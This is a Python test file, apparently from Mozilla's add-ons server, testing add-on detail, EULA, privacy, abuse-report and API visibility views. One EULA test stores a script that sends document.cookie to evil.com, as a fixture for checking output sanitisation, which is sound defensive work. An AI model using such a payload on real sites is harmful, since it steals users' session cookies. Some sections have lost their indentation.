    license.builtin = 11
    license.name = 'License to Kill'  # Will be overriden by constant
    license.url = g
    license.save()
    assert license._constant == constant
    assert license.builtin == 11
    assert license.url == g
    a = self.get_pq()('.secondary.metadata .source-license a')
    assert a.attr('href') == g
    # The displayed name comes from the builtin constant, not the model.
    assert a.text() == constant.name
def test_license_link_custom(self):
    """A custom license links to the add-on's own license page."""
    version = self.addon._current_version
    assert version.license.url is None
    link = self.get_pq()('.secondary.metadata .source-license a')
    assert link.attr('href') == version.license_url()
    assert link.attr('target') is None
    assert link.text() == 'Custom License'
def get_more_pq(self):
    """Fetch the AJAX 'more' URL and return it as a PyQuery doc."""
    response = self.client.get_ajax(self.more_url)
    return pq(response.content)
def test_other_addons(self):
    """Ensure listed add-ons by the same author show up."""
    other = Addon.objects.get(id=592)
    Addon.objects.get(id=4594).delete()
    # Sanity check: `other` is the only other listed Firefox add-on left.
    assert list(Addon.objects.listed(amo.FIREFOX).exclude(
        id=self.addon.id)) == [other]
    add_addon_author(other, self.addon)
    doc = self.get_more_pq()('#author-addons')
    _test_hovercards(self, doc, [other], src='dp-dl-othersby')
def test_other_addons_no_unlisted(self):
    """An unlisted add-on by the same author should not show up."""
    other = Addon.objects.get(id=592)
    # Non-public and user-disabled: must be excluded from the section.
    other.update(status=amo.STATUS_NOMINATED, disabled_by_user=True)
    add_addon_author(other, self.addon)
    assert self.get_more_pq()('#author-addons').length == 0
def test_other_addons_by_others(self):
    """Add-ons by different authors should not show up."""
    other_author = UserProfile.objects.get(pk=999)
    AddonUser.objects.create(
        addon=self.addon, user=other_author, listed=True)
    assert self.get_more_pq()('#author-addons').length == 0
def test_other_addons_none(self):
    """Without other add-ons by the author, the section is absent."""
    assert self.get_more_pq()('#author-addons').length == 0
def test_categories(self):
    """The related box lists the add-on's Firefox categories as links."""
    links = self.get_more_pq()('#related ul:first').find('a')
    expected = [(unicode(c.name), c.get_url_path())
                for c in self.addon.categories.filter(
                    application=amo.FIREFOX.id)]
    amo.tests.check_links(expected, links)
def test_static_theme_detail(self):
    """Static themes show their version preview image on the page."""
    self.addon.update(type=amo.ADDON_STATICTHEME)
    version_preview = VersionPreview.objects.create(
        version=self.addon.current_version)
    response = self.client.get(self.url)
    assert response.status_code == 200
    doc = pq(response.content)
    assert doc('.previews')
    # Exactly one preview panel, backed by the VersionPreview thumbnail.
    assert len(doc('.previews li.panel')) == 1
    img = doc('.previews li.panel img')[0]
    assert img.attrib['src'] == version_preview.thumbnail_url
class TestPersonas(object):
    """Mixin providing shared fixtures/helpers for persona view tests."""
    fixtures = ['addons/persona', 'base/users']

    def create_addon_user(self, addon):
        """Attach the fixture user (id 999) as an author of `addon`."""
        return AddonUser.objects.create(addon=addon, user_id=999)
# Overwrite the caches setting to a MemcachedCache backend to test a
# regression that caused cache-keys to be longer than 250 characters
# https://github.com/mozilla/addons-server/issues/8598
cache_settings = settings.CACHES.copy()
cache_settings['default'] = {
    'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
    # Location is environment-configurable so CI can point at its own
    # memcached instance; defaults to a local one.
    'LOCATION': os.environ.get('MEMCACHE_LOCATION', 'localhost:11211'),
}
@override_settings(CACHES=cache_settings)
class TestPersonaDetailPage(TestPersonas, TestCase):
    """Detail-page tests for personas (lightweight themes)."""

    def setUp(self):
        # Name the *current* class in super() so the whole MRO (including
        # the TestPersonas mixin) gets a chance to run its setUp. The
        # original named TestPersonas, which skips the mixin in the MRO.
        super(TestPersonaDetailPage, self).setUp()
        self.addon = Addon.objects.get(id=15663)
        self.persona = self.addon.persona
        self.url = self.addon.get_url_path()
        self.create_addon_user(self.addon)

    def test_persona_images(self):
        """Icon and preview images come from the persona object."""
        r = self.client.get(self.url)
        doc = pq(r.content)
        assert doc('h2.addon img').attr('src') == self.persona.icon_url
        style = doc('#persona div[data-browsertheme]').attr('style')
        assert self.persona.preview_url in style, (
            'style attribute %s does not link to %s' % (
                style, self.persona.preview_url))

    def test_more_personas(self):
        """Other personas by the same artist produce a more-link."""
        other = addon_factory(type=amo.ADDON_PERSONA)
        self.create_addon_user(other)
        r = self.client.get(self.url)
        assert pq(r.content)('#more-artist .more-link').length == 1

    def test_not_personas(self):
        """Non-persona add-ons by the artist don't produce a more-link."""
        other = addon_factory(type=amo.ADDON_EXTENSION)
        self.create_addon_user(other)
        r = self.client.get(self.url)
        assert pq(r.content)('#more-artist .more-link').length == 0

    def test_new_more_personas(self):
        """With persona_id 0, the more-link targets the author profile."""
        other = addon_factory(type=amo.ADDON_PERSONA)
        self.create_addon_user(other)
        self.persona.persona_id = 0
        self.persona.save()
        r = self.client.get(self.url)
        profile = UserProfile.objects.get(id=999).get_url_path()
        assert pq(r.content)('#more-artist .more-link').attr('href') == (
            profile + '?src=addon-detail')

    def test_other_personas(self):
        """Ensure listed personas by the same author show up."""
        # These three must all be excluded: wrong status or disabled,
        # or simply not by this author.
        addon_factory(type=amo.ADDON_PERSONA, status=amo.STATUS_NULL)
        addon_factory(type=amo.ADDON_PERSONA, status=amo.STATUS_PUBLIC)
        addon_factory(type=amo.ADDON_PERSONA, disabled_by_user=True)
        other = addon_factory(type=amo.ADDON_PERSONA)
        self.create_addon_user(other)
        assert other.status == amo.STATUS_PUBLIC
        assert not other.disabled_by_user
        r = self.client.get(self.url)
        assert list(r.context['author_personas']) == [other]
        a = pq(r.content)('#more-artist .persona.hovercard > a')
        assert a.length == 1
        assert a.attr('href') == other.get_url_path()

    def _test_by(self):
        """Test that the by... bit works."""
        r = self.client.get(self.url)
        assert pq(r.content)('h4.author').text().startswith('by regularuser')

    def test_by(self):
        self._test_by()

    def test_personas_categories(self):
        """The category box shows a 'More ... Themes' heading."""
        static_category = (
            CATEGORIES[amo.FIREFOX.id][amo.ADDON_PERSONA]['film-and-tv'])
        category = Category.from_static_category(static_category, True)
        AddonCategory.objects.create(addon=self.addon, category=category)
        r = self.client.get(self.url)
        assert (
            pq(r.content)('#more-category>h3').text() ==
            'More Film and TV Themes')
class TestStatus(TestCase):
    """Detail-page visibility for every add-on / persona status."""
    fixtures = ['base/addon_3615', 'addons/persona']

    def setUp(self):
        super(TestStatus, self).setUp()
        self.addon = Addon.objects.get(id=3615)
        self.version = self.addon.current_version
        self.file = self.version.all_files[0]
        assert self.addon.status == amo.STATUS_PUBLIC
        self.url = self.addon.get_url_path()
        self.persona = Addon.objects.get(id=15663)
        assert self.persona.status == amo.STATUS_PUBLIC
        self.persona_url = self.persona.get_url_path()

    def test_incomplete(self):
        self.addon.update(status=amo.STATUS_NULL)
        assert self.client.get(self.url).status_code == 404

    def test_pending(self):
        self.addon.update(status=amo.STATUS_PENDING)
        assert self.client.get(self.url).status_code == 404

    def test_nominated(self):
        self.addon.update(status=amo.STATUS_NOMINATED)
        assert self.client.get(self.url).status_code == 200

    def test_public(self):
        self.addon.update(status=amo.STATUS_PUBLIC)
        assert self.client.get(self.url).status_code == 200

    def test_deleted(self):
        self.addon.update(status=amo.STATUS_DELETED)
        assert self.client.get(self.url).status_code == 404

    def test_disabled(self):
        self.addon.update(status=amo.STATUS_DISABLED)
        assert self.client.get(self.url).status_code == 404

    def test_disabled_by_user(self):
        self.addon.update(disabled_by_user=True)
        assert self.client.get(self.url).status_code == 404

    def test_persona(self):
        # Personas are visible (200) only when public or pending.
        # STATUS_DELETED is skipped — presumably it can't be set via
        # save() like the others; verify.
        for status in Persona.STATUS_CHOICES.keys():
            if status == amo.STATUS_DELETED:
                continue
            self.persona.status = status
            self.persona.save()
            assert self.client.head(self.persona_url).status_code == (
                200 if status in [amo.STATUS_PUBLIC, amo.STATUS_PENDING]
                else 404)

    def test_persona_disabled(self):
        # A user-disabled persona is never visible, whatever its status.
        for status in Persona.STATUS_CHOICES.keys():
            if status == amo.STATUS_DELETED:
                continue
            self.persona.status = status
            self.persona.disabled_by_user = True
            self.persona.save()
            assert self.client.head(self.persona_url).status_code == 404
class TestTagsBox(TestCase):
    """Tests for the tag box on the detail-more fragment."""
    fixtures = ['base/addontag']

    def test_tag_box(self):
        """Verify that we don't show duplicate tags."""
        url = reverse('addons.detail_more', args=[8680])
        response = self.client.get_ajax(url, follow=True)
        doc = pq(response.content)
        assert doc('#tagbox ul').children().text() == 'SEO'
class TestEulaPolicyRedirects(TestCase):
    """Legacy policy URLs should 301 to the zamboni-style URLs."""

    def test_eula_legacy_url(self):
        """
        See that we get a 301 to the zamboni style URL
        """
        response = self.client.get('/en-US/firefox/addons/policy/0/592/42')
        assert response.status_code == 301
        assert '/addon/592/eula/42' in response['Location']

    def test_policy_legacy_url(self):
        """
        See that we get a 301 to the zamboni style URL
        """
        response = self.client.get('/en-US/firefox/addons/policy/0/592/')
        assert response.status_code == 301
        assert '/addon/592/privacy/' in response['Location']
class TestEula(TestCase):
    """Tests for the add-on EULA page."""
    fixtures = ['addons/eula+contrib-addon']

    def setUp(self):
        super(TestEula, self).setUp()
        self.addon = Addon.objects.get(id=11730)
        self.url = self.get_url()

    def get_url(self, args=None):
        # Build the EULA URL, optionally for a specific file id.
        if args is None:
            args = []
        return reverse('addons.eula', args=[self.addon.slug] + args)

    def test_current_version(self):
        r = self.client.get(self.url)
        assert r.context['version'] == self.addon.current_version

    def test_simple_html_is_rendered(self):
        # Benign markup in the EULA is kept intact when rendered.
        self.addon.eula = """
            <strong> what the hell..</strong>
            <ul>
                <li>papparapara</li>
                <li>todotodotodo</li>
            </ul>
            <ol>
                <a href="irc://irc.mozilla.org/firefox">firefox</a>
                Introduce yourself to the community, if you like!
                This text will appear publicly on your user info page.
                <li>papparapara2</li>
                <li>todotodotodo2</li>
            </ol>
            """
        self.addon.save()

        r = self.client.get(self.url)
        doc = pq(r.content)

        assert norm(doc('.policy-statement strong')) == (
            '<strong> what the hell..</strong>')
        assert norm(doc('.policy-statement ul')) == (
            '<ul><li>papparapara</li><li>todotodotodo</li></ul>')
        assert doc('.policy-statement ol a').text() == 'firefox'
        assert norm(doc('.policy-statement ol li:first')) == (
            '<li>papparapara2</li>')

    def test_evil_html_is_not_rendered(self):
        self.addon.eula = """
            <script type="text/javascript">
                window.location = 'http://evil.com/?c=' + document.cookie;
            </script>
            Muhuhahahahahahaha!
            """
        self.addon.save()

        r = self.client.get(self.url)
        doc = pq(r.content)

        policy = str(doc('.policy-statement'))
        assert policy.startswith('<div class="policy-statement"><script'), (
            'Unexpected: %s' % policy[:50])

    def test_old_version(self):
        # A specific (older) file id selects that version's EULA context.
        old = self.addon.versions.order_by('created')[0]
        assert old != self.addon.current_version
        r = self.client.get(self.get_url([old.all_files[0].id]))
        assert r.context['version'] == old

    def test_deleted_version(self):
        old = self.addon.versions.order_by('created')[0]
        assert old != self.addon.current_version
        old.delete()
        response = self.client.get(self.get_url([old.all_files[0].id]))
        assert response.status_code == 404

    def test_redirect_no_eula(self):
        # Without a EULA, the page redirects back to the detail page.
        self.addon.update(eula=None)
        r = self.client.get(self.url, follow=True)
        self.assert3xx(r, self.addon.get_url_path())

    def test_cat_sidebar(self):
        check_cat_sidebar(self.url, self.addon)
class TestXssOnName(amo.tests.TestXss):
    """Add-on names must be escaped on every add-on-facing page."""

    def test_eula_page(self):
        self.assertNameAndNoXSS(
            reverse('addons.eula', args=[self.addon.slug]))

    def test_detail_page(self):
        self.assertNameAndNoXSS(
            reverse('addons.detail', args=[self.addon.slug]))

    def test_privacy_page(self):
        self.assertNameAndNoXSS(
            reverse('addons.privacy', args=[self.addon.slug]))

    def test_reviews_list(self):
        self.assertNameAndNoXSS(
            reverse('addons.ratings.list', args=[self.addon.slug]))

    def test_reviews_add(self):
        self.client.login(email='fligtar@gmail.com')
        self.assertNameAndNoXSS(
            reverse('addons.ratings.add', args=[self.addon.slug]))
class TestPrivacyPolicy(TestCase):
    """Tests for the add-on privacy policy page."""
    fixtures = ['addons/eula+contrib-addon']

    def setUp(self):
        super(TestPrivacyPolicy, self).setUp()
        self.addon = Addon.objects.get(id=11730)
        self.url = reverse('addons.privacy', args=[self.addon.slug])

    def test_redirect_no_eula(self):
        """Without a policy, redirect back to the detail page."""
        assert self.addon.privacy_policy is None
        response = self.client.get(self.url, follow=True)
        self.assert3xx(response, self.addon.get_url_path())

    def test_cat_sidebar(self):
        self.addon.privacy_policy = 'shizzle'
        self.addon.save()
        check_cat_sidebar(self.url, self.addon)
@patch.object(settings, 'NOBOT_RECAPTCHA_PRIVATE_KEY', 'something')
class TestReportAbuse(TestCase):
    """Tests for the add-on abuse-report form."""
    fixtures = ['addons/persona', 'base/addon_3615', 'base/users']

    def setUp(self):
        super(TestReportAbuse, self).setUp()
        self.full_page = reverse('addons.abuse', args=['a3615'])

    @patch('olympia.amo.fields.ReCaptchaField.clean')
    def test_abuse_anonymous(self, clean):
        """Anonymous reports go through once the captcha field passes."""
        clean.return_value = ""
        self.client.post(self.full_page, {'text': 'spammy'})
        assert len(mail.outbox) == 1
        assert 'spammy' in mail.outbox[0].body
        report = AbuseReport.objects.get(addon=3615)
        assert report.message == 'spammy'
        # Anonymous report: no reporter is recorded.
        assert report.reporter is None

    def test_abuse_anonymous_fails(self):
        """Without a captcha answer the form errors out."""
        r = self.client.post(self.full_page, {'text': 'spammy'})
        assert 'recaptcha' in r.context['abuse_form'].errors

    def test_abuse_logged_in(self):
        """Logged-in reports record the reporter on the AbuseReport."""
        self.client.login(email='regular@mozilla.com')
        self.client.post(self.full_page, {'text': 'spammy'})
        assert len(mail.outbox) == 1
        assert 'spammy' in mail.outbox[0].body
        report = AbuseReport.objects.get(addon=3615)
        assert report.message == 'spammy'
        assert report.reporter.email == 'regular@mozilla.com'

    def test_abuse_name(self):
        # Non-ASCII add-on names must not break the report email.
        addon = Addon.objects.get(pk=3615)
        addon.name = 'Bmrk.ru Социальные закладки'
        addon.save()

        self.client.login(email='regular@mozilla.com')
        self.client.post(self.full_page, {'text': 'spammy'})

        assert 'spammy' in mail.outbox[0].body
        assert AbuseReport.objects.get(addon=addon)

    def test_abuse_persona(self):
        """The abuse form is present and functional on persona pages."""
        shared_url = reverse('addons.detail', args=['a15663'])
        r = self.client.get(shared_url)
        doc = pq(r.content)
        assert doc("fieldset.abuse")

        # and now just test it works
        self.client.login(email='regular@mozilla.com')
        r = self.client.post(reverse('addons.abuse', args=['a15663']),
                             {'text': 'spammy'})
        self.assert3xx(r, shared_url)
        assert len(mail.outbox) == 1
        assert 'spammy' in mail.outbox[0].body
        assert AbuseReport.objects.get(addon=15663)
class TestFindReplacement(TestCase):
    """Tests for the find_replacement guid-lookup redirect view."""

    def test_no_match(self):
        """Unknown guids redirect to the default replacement path."""
        self.url = reverse('addons.find_replacement') + '?guid=xxx'
        response = self.client.get(self.url)
        expected = (
            DEFAULT_FIND_REPLACEMENT_PATH + '?src=%s' % FIND_REPLACEMENT_SRC)
        self.assert3xx(response, expected)

    def test_match(self):
        """A matching ReplacementAddon path is used for the redirect."""
        addon_factory(slug='replacey')
        ReplacementAddon.objects.create(guid='xxx', path='/addon/replacey/')
        self.url = reverse('addons.find_replacement') + '?guid=xxx'
        response = self.client.get(self.url)
        expected = '/addon/replacey/?src=%s' % FIND_REPLACEMENT_SRC
        self.assert3xx(response, expected)

    def test_match_no_leading_slash(self):
        """Paths stored without a leading slash still redirect correctly."""
        addon_factory(slug='replacey')
        ReplacementAddon.objects.create(guid='xxx', path='addon/replacey/')
        self.url = reverse('addons.find_replacement') + '?guid=xxx'
        response = self.client.get(self.url)
        expected = '/addon/replacey/?src=%s' % FIND_REPLACEMENT_SRC
        self.assert3xx(response, expected)

    def test_no_guid_param_is_404(self):
        """Omitting the guid parameter yields a 404."""
        self.url = reverse('addons.find_replacement')
        response = self.client.get(self.url)
        assert response.status_code == 404

    def test_external_url(self):
        """External replacement URLs go through the outgoing redirector."""
        ReplacementAddon.objects.create(
            guid='xxx', path='https://mozilla.org/')
        self.url = reverse('addons.find_replacement') + '?guid=xxx'
        response = self.client.get(self.url)
        self.assert3xx(
            response, get_outgoing_url('https://mozilla.org/'))
class AddonAndVersionViewSetDetailMixin(object):
"""Tests that play with addon state and permissions. Shared between addon
and version viewset detail tests since both need to react the same way."""
def _test_url(self):
raise NotImplementedError
def _set_tested_url(self, param):
raise NotImplementedError
def test_get_by_id(self):
self._test_url()
def test_get_by_slug(self):
self._set_tested_url(self.addon.slug)
self._test_url()
def test_get_by_guid(self):
self._set_tested_url(self.addon.guid)
self._test_url()
def test_get_by_guid_uppercase(self):
self._set_tested_url(self.addon.guid.upper())
self._test_url()
def test_get_by_guid_email_format(self):
self.addon.update(guid='my-addon@example.tld')
self._set_tested_url(self.addon.guid)
self._test_url()
def test_get_by_guid_email_short_format(self):
self.addon.update(guid='@example.tld')
self._set_tested_url(self.addon.guid)
self._test_url()
def test_get_by_guid_email_really_short_format(self):
self.addon.update(guid='@example')
self._set_tested_url(self.addon.guid)
self._test_url()
def test_get_not_public_anonymous(self):
self.addon.update(status=amo.STATUS_NOMINATED)
response = self.client.get(self.url)
assert response.status_code == 401
data = json.loads(response.content)
assert data['detail'] == (
'Authentication credentials were not provided.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is False
def test_get_not_public_no_rights(self):
self.addon.update(status=amo.STATUS_NOMINATED)
user = UserProfile.objects.create(username='simpleuser')
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 403
data = json.loads(response.content)
assert data['detail'] == (
'You do not have permission to perform this action.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is False
def test_get_not_public_reviewer(self):
self.addon.update(status=amo.STATUS_NOMINATED)
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 200
def test_get_not_public_author(self):
self.addon.update(status=amo.STATUS_NOMINATED)
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 200
def test_get_disabled_by_user_anonymous(self):
self.addon.update(disabled_by_user=True)
response = self.client.get(self.url)
assert response.status_code == 401
data = json.loads(response.content)
assert data['detail'] == (
'Authentication credentials were not provided.')
assert data['is_disabled_by_developer'] is True
assert data['is_disabled_by_mozilla'] is False
def test_get_disabled_by_user_other_user(self):
self.addon.update(disabled_by_user=True)
user = UserProfile.objects.create(username='someone')
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 403
data = json.loads(response.content)
assert data['detail'] == (
'You do not have permission to perform this action.')
assert data['is_disabled_by_developer'] is True
assert data['is_disabled_by_mozilla'] is False
def test_disabled_by_admin_anonymous(self):
self.addon.update(status=amo.STATUS_DISABLED)
response = self.client.get(self.url)
assert response.status_code == 401
data = json.loads(response.content)
assert data['detail'] == (
'Authentication credentials were not provided.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is True
def test_disabled_by_admin_no_rights(self):
self.addon.update(status=amo.STATUS_DISABLED)
user = UserProfile.objects.create(username='someone')
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 403
data = json.loads(response.content)
assert data['detail'] == (
'You do not have permission to perform this action.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is True
def test_get_not_listed(self):
self.make_addon_unlisted(self.addon)
response = self.client.get(self.url)
assert response.status_code == 401
data = json.loads(response.content)
assert data['detail'] == (
'Authentication credentials were not provided.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is False
def test_get_not_listed_no_rights(self):
user = UserProfile.objects.create(username='simpleuser')
self.make_addon_unlisted(self.addon)
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 403
data = json.loads(response.content)
assert data['detail'] == (
'You do not have permission to perform this action.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is False
def test_get_not_listed_simple_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.make_addon_unlisted(self.addon)
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 403
data = json.loads(response.content)
assert data['detail'] == (
'You do not have permission to perform this action.')
assert data['is_disabled_by_developer'] is False
assert data['is_disabled_by_mozilla'] is False
def test_get_not_listed_specific_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:ReviewUnlisted')
self.make_addon_unlisted(self.addon)
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 200
def test_get_not_listed_author(self):
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.make_addon_unlisted(self.addon)
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 200
def test_get_deleted(self):
self.addon.delete()
response = self.client.get(self.url)
assert response.status_code == 404
data = json.loads(response.content)
assert data['detail'] == 'Not found.'
# `is_disabled_by_developer` and `is_disabled_by_mozilla` are only
# added for 401/403.
assert 'is_disabled_by_developer' not in data
assert 'is_disabled_by_mozilla' not in data
def test_get_deleted_no_rights(self):
self.addon.delete()
user = UserProfile.objects.create(username='simpleuser')
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 404
data = json.loads(response.content)
assert data['detail'] == 'Not found.'
# `is_disabled_by_developer` and `is_disabled_by_mozilla` are only
# added for 401/403.
assert 'is_disabled_by_developer' not in data
assert 'is_disabled_by_mozilla' not in data
def test_get_deleted_reviewer(self):
user = UserProfile.objects.create(username='reviewer')
self.grant_permission(user, 'Addons:Review')
self.addon.delete()
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 404
data = json.loads(response.content)
assert data['detail'] == 'Not found.'
# `is_disabled_by_developer` and `is_disabled_by_mozilla` are only
# added for 401/403.
assert 'is_disabled_by_developer' not in data
assert 'is_disabled_by_mozilla' not in data
def test_get_deleted_admin(self):
user = UserProfile.objects.create(username='admin')
self.grant_permission(user, 'Addons:ViewDeleted,Addons:Review')
self.addon.delete()
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 200
def test_get_deleted_author(self):
# Owners can't see their own add-on once deleted, only admins can.
user = UserProfile.objects.create(username='author')
AddonUser.objects.create(user=user, addon=self.addon)
self.addon.delete()
self.client.login_api(user)
response = self.client.get(self.url)
assert response.status_code == 404
data = json.loads(response.content)
assert data['detail'] == 'Not found.'
# `is_disabled_by_developer` and `is_disabled_by_mozilla` are only
# added for 401/403.
assert 'is_disabled_by_developer' not in data
assert 'is_disabled_by_mozilla' not in data
def test_get_addon_not_found(self):
    """An unknown pk yields a bare 404 with no disabled flags."""
    self._set_tested_url(self.addon.pk + 42)
    response = self.client.get(self.url)
    assert response.status_code == 404
    payload = json.loads(response.content)
    assert payload['detail'] == 'Not found.'
    # `is_disabled_by_developer` and `is_disabled_by_mozilla` are only
    # added for 401/403.
    assert 'is_disabled_by_developer' not in payload
    assert 'is_disabled_by_mozilla' not in payload
class TestAddonViewSetDetail(AddonAndVersionViewSetDetailMixin, TestCase):
    """Detail endpoint tests specific to the add-on viewset.

    Covers routing, visibility of `latest_unlisted_version` per user kind,
    and the `lang` query parameter.
    """
    client_class = APITestClient

    def setUp(self):
        super(TestAddonViewSetDetail, self).setUp()
        self.addon = addon_factory(
            guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon')
        self._set_tested_url(self.addon.pk)

    def _test_url(self):
        # Fetch the tested URL, validate the basic serialized payload and
        # return the parsed JSON for further assertions.
        response = self.client.get(self.url)
        assert response.status_code == 200
        result = json.loads(response.content)
        assert result['id'] == self.addon.pk
        assert result['name'] == {'en-US': u'My Addôn'}
        assert result['slug'] == self.addon.slug
        assert result['last_updated'] == (
            self.addon.last_updated.replace(microsecond=0).isoformat() + 'Z')
        return result

    def _set_tested_url(self, param):
        self.url = reverse_ns('addon-detail', kwargs={'pk': param})

    def test_detail_url_with_reviewers_in_the_url(self):
        # A slug containing the word "reviewers" must not be mis-routed.
        self.addon.update(slug='something-reviewers')
        self.url = reverse_ns('addon-detail', kwargs={'pk': self.addon.slug})
        self._test_url()

    def test_hide_latest_unlisted_version_anonymous(self):
        unlisted_version = version_factory(
            addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED)
        unlisted_version.update(created=self.days_ago(1))

        result = self._test_url()
        assert 'latest_unlisted_version' not in result

    def test_hide_latest_unlisted_version_simple_reviewer(self):
        # A listed-content reviewer should not see unlisted versions.
        user = UserProfile.objects.create(username='reviewer')
        self.grant_permission(user, 'Addons:Review')
        self.client.login_api(user)
        unlisted_version = version_factory(
            addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED)
        unlisted_version.update(created=self.days_ago(1))

        result = self._test_url()
        assert 'latest_unlisted_version' not in result

    def test_show_latest_unlisted_version_author(self):
        user = UserProfile.objects.create(username='author')
        AddonUser.objects.create(user=user, addon=self.addon)
        self.client.login_api(user)
        unlisted_version = version_factory(
            addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED)
        unlisted_version.update(created=self.days_ago(1))

        result = self._test_url()
        assert result['latest_unlisted_version']
        assert result['latest_unlisted_version']['id'] == unlisted_version.pk

    def test_show_latest_unlisted_version_unlisted_reviewer(self):
        # This user is an unlisted reviewer (username kept consistent with
        # the other reviewer tests).
        user = UserProfile.objects.create(username='reviewer')
        self.grant_permission(user, 'Addons:ReviewUnlisted')
        self.client.login_api(user)
        unlisted_version = version_factory(
            addon=self.addon, channel=amo.RELEASE_CHANNEL_UNLISTED)
        unlisted_version.update(created=self.days_ago(1))

        result = self._test_url()
        assert result['latest_unlisted_version']
        assert result['latest_unlisted_version']['id'] == unlisted_version.pk

    def test_with_lang(self):
        # `lang=xx` collapses the translated `name` field to a single
        # string in the requested locale.
        self.addon.name = {
            'en-US': u'My Addôn, mine',
            'fr': u'Mon Addôn, le mien',
        }
        self.addon.save()

        response = self.client.get(self.url, {'lang': 'en-US'})
        assert response.status_code == 200
        result = json.loads(response.content)
        assert result['id'] == self.addon.pk
        assert result['name'] == u'My Addôn, mine'

        response = self.client.get(self.url, {'lang': 'fr'})
        assert response.status_code == 200
        result = json.loads(response.content)
        assert result['id'] == self.addon.pk
        assert result['name'] == u'Mon Addôn, le mien'

        # Requesting en-US again must not be affected by the earlier fr
        # request (guards against bad caching of the translated field).
        response = self.client.get(self.url, {'lang': 'en-US'})
        assert response.status_code == 200
        result = json.loads(response.content)
        assert result['id'] == self.addon.pk
        assert result['name'] == u'My Addôn, mine'
class TestVersionViewSetDetail(AddonAndVersionViewSetDetailMixin, TestCase):
    """Detail endpoint tests for a single version of an add-on.

    Exercises visibility rules (disabled files, deleted versions, unlisted
    channel) for anonymous users, regular users, authors, reviewers and
    admins.
    """
    client_class = APITestClient

    def setUp(self):
        super(TestVersionViewSetDetail, self).setUp()
        self.addon = addon_factory(
            guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon')

        # Don't use addon.current_version, changing its state as we do in
        # the tests might render the add-on itself inaccessible.
        self.version = version_factory(addon=self.addon)

        self._set_tested_url(self.addon.pk)

    def _test_url(self):
        # Fetch the tested URL and check the basic version payload.
        response = self.client.get(self.url)
        assert response.status_code == 200
        result = json.loads(response.content)
        assert result['id'] == self.version.pk
        assert result['version'] == self.version.version

    def _set_tested_url(self, param):
        self.url = reverse_ns('addon-version-detail', kwargs={
            'addon_pk': param, 'pk': self.version.pk})

    def test_version_get_not_found(self):
        self.url = reverse_ns('addon-version-detail', kwargs={
            'addon_pk': self.addon.pk, 'pk': self.version.pk + 42})
        response = self.client.get(self.url)
        assert response.status_code == 404

    def test_disabled_version_reviewer(self):
        user = UserProfile.objects.create(username='reviewer')
        self.grant_permission(user, 'Addons:Review')
        self.client.login_api(user)
        self.version.files.update(status=amo.STATUS_DISABLED)
        self._test_url()

    def test_disabled_version_author(self):
        user = UserProfile.objects.create(username='author')
        AddonUser.objects.create(user=user, addon=self.addon)
        self.client.login_api(user)
        self.version.files.update(status=amo.STATUS_DISABLED)
        self._test_url()

    def test_disabled_version_admin(self):
        user = UserProfile.objects.create(username='admin')
        self.grant_permission(user, '*:*')
        self.client.login_api(user)
        self.version.files.update(status=amo.STATUS_DISABLED)
        self._test_url()

    def test_disabled_version_anonymous(self):
        # Anonymous users are asked to authenticate (401), not told 404.
        self.version.files.update(status=amo.STATUS_DISABLED)
        response = self.client.get(self.url)
        assert response.status_code == 401

    def test_disabled_version_user_but_not_author(self):
        self.version.files.update(status=amo.STATUS_DISABLED)
        user = UserProfile.objects.create(username='simpleuser')
        self.client.login_api(user)
        self.version.files.update(status=amo.STATUS_DISABLED)
        response = self.client.get(self.url)
        assert response.status_code == 403

    def test_deleted_version_reviewer(self):
        user = UserProfile.objects.create(username='reviewer')
        self.grant_permission(user, 'Addons:Review')
        self.client.login_api(user)
        self.version.delete()
        response = self.client.get(self.url)
        assert response.status_code == 404

    def test_deleted_version_author(self):
        user = UserProfile.objects.create(username='author')
        AddonUser.objects.create(user=user, addon=self.addon)
        self.client.login_api(user)
        self.version.delete()
        response = self.client.get(self.url)
        assert response.status_code == 404

    def test_deleted_version_admin(self):
        # Only admins keep access to a deleted version.
        user = UserProfile.objects.create(username='admin')
        self.grant_permission(user, '*:*')
        self.client.login_api(user)
        self.version.delete()
        self._test_url()

    def test_deleted_version_anonymous(self):
        self.version.delete()
        response = self.client.get(self.url)
        assert response.status_code == 404

    def test_deleted_version_user_but_not_author(self):
        user = UserProfile.objects.create(username='simpleuser')
        self.client.login_api(user)
        self.version.delete()
        response = self.client.get(self.url)
        assert response.status_code == 404

    def test_unlisted_version_reviewer(self):
        # A plain (listed) reviewer may not view unlisted versions.
        user = UserProfile.objects.create(username='reviewer')
        self.grant_permission(user, 'Addons:Review')
        self.client.login_api(user)
        self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
        response = self.client.get(self.url)
        assert response.status_code == 403

